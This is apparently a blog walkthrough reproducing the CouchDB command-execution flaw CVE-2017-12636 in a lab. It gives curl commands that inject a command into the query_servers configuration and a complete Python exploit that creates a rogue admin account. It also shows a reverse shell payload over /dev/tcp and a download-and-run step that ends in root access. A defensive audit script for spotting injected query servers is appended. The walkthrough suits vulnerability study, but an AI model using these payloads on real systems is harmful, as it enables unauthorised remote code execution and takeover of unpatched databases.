Reproducing vulnerabilities with Vulnhub - CouchDB arbitrary command execution vulnerability (CVE-2017-12636)

Vulnerability principle:
Apache CouchDB is an open source database that focuses on ease of use and on being "a database that completely embraces the web". It is a NoSQL database that uses JSON as its storage format, JavaScript as its query language, and MapReduce and HTTP as its API. It is widely used, for example by the BBC for its dynamic content display platform, by Credit Suisse for the market framework of its internal commodities department, and by Meebo for its social platform (web and applications).

On November 15, 2017, CVE-2017-12635 and CVE-2017-12636 were disclosed. CVE-2017-12636 is an arbitrary command execution vulnerability: through the config API we can modify CouchDB's query_server configuration, and the program set in that configuration item is run when a view is executed.

Vulnerability reproduction:
1. Add a new query_server configuration entry containing the command to be executed:
curl -X PUT 'http://pppp:pppp@target-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
The red arrow points to the account and password I created myself, as shown below.
2. Create a temporary database and a temporary table, and insert a record:
① curl -X PUT 'http://pppp:pppp@target-ip:5984/oll'
② curl -X PUT 'http://pppp:pppp@target-ip:5984/oll/vul' -d '{"_id": "770895a97726d5ca6d70a22173005c7b"}'
The red arrow points to the table I created myself.
3. Call the query_server to process the data:
curl -X PUT http://pppp:pppp@target-ip:5984/oll/_design/vul -d '{"_id": "_design/test", "views": {"wooyun": {"map": ""}}, "language": "cmd"}' -H "Content-Type: application/json"

Using the EXP to get a reverse shell:
1. Reverse shell script: create an index.html in the home directory and add the following:
bash -i >& /dev/tcp/172.16.11.2/9000 0>&1
The red arrow points to the local machine's IP.
2. In another terminal, run python -m SimpleHTTPServer 8000 in the home directory.
3. Create an exp.py script, as follows:
#!/usr/bin/env python3
import requests
from requests.auth import HTTPBasicAuth

target = 'http://192.168.8.148:5984'
command = '"bash -i >& /dev/tcp/192.168.8.148/4444 0>&1"'
version = 2  # 1 for CouchDB 1.x, 2 for CouchDB 2.x

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }

# Create the account used for the following requests
# (the repeated "roles" key is part of the original script)
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

# Write the command into the query_servers configuration
if version == 1:
    session.put(target + '/_config/query_servers/cmd', data=command)
else:
    # 2.x exposes the configuration per node, so look up the node name first
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=command)

# Create a database and insert one document
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

# Run a view whose language is "cmd", which invokes the configured query server
if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')


4. Change the command value in exp.py to curl 172.16.11.2:8000 -o /tmp/bashell, then save and run python exp.py.
At this point you can see that the HTTP service received the download request successfully.

5. Open another terminal and run nc -lnvp 9000 to listen on local port 9000.

6. Change the command value in exp.py to bash /tmp/bashell, save, and run python exp.py; the reverse shell is obtained successfully.
The IP is the IP of the target machine (be sure to write it correctly; don't do what I did and get the IP wrong, I worried over it for a day).

7. Success.
Got root.
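
Seen from the defending side, the steps above leave three traces: a query_servers entry that is not one of the stock languages, a design document whose "language" names that entry, and a PUT to the query_servers configuration path. The following audit sketch is an added example, not part of the original post or of CouchDB; the allowlist, the function names and all sample data are assumptions constructed for illustration.

```python
import json
import re

# Assumption: the only query servers a stock CouchDB 1.x/2.x config defines.
ALLOWED_LANGUAGES = {"javascript", "coffeescript"}
# Matches both config paths used on this page (1.x form and 2.x per-node form).
CONFIG_PATH = re.compile(r"^/(?:_node/[^/]+/)?_config/query_servers/([^/?]+)")


def audit_query_servers(section):
    """Return {name: command} for query servers outside the allowlist."""
    return {k: v for k, v in section.items() if k not in ALLOWED_LANGUAGES}


def audit_design_doc(doc):
    """True if a design document selects a non-allowlisted view language."""
    # A design document without "language" is treated as javascript.
    return doc.get("language", "javascript") not in ALLOWED_LANGUAGES


def audit_request(method, path):
    """Return the query server name if the request writes one, else None."""
    m = CONFIG_PATH.match(path)
    return m.group(1) if m and method == "PUT" else None


# Constructed sample data, shaped like the configuration and requests above.
SAMPLE_CONFIG = json.loads("""{
  "javascript": "./bin/couchjs ./share/server/main.js",
  "coffeescript": "./bin/couchjs ./share/server/main-coffee.js",
  "cmd": "id >/tmp/success"
}""")
SAMPLE_DESIGN = {"_id": "_design/test", "language": "cmd",
                 "views": {"wooyun": {"map": ""}}}
SAMPLE_REQUESTS = [
    ("GET", "/_membership"),
    ("PUT", "/_config/query_servers/cmd"),
    ("PUT", "/_node/couchdb@localhost/_config/query_servers/cmd"),
    ("PUT", "/_config/httpd/bind_address"),
]

if __name__ == "__main__":
    print("unexpected query servers:", audit_query_servers(SAMPLE_CONFIG))
    print("design doc flagged:", audit_design_doc(SAMPLE_DESIGN))
    for method, path in SAMPLE_REQUESTS:
        print(method, path, "->", audit_request(method, path))
```

On a live server the dictionary passed to audit_query_servers would be the JSON body returned by a GET on the same query_servers configuration path that step 1 writes to.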


Origin blog.51cto.com/14259144/2421181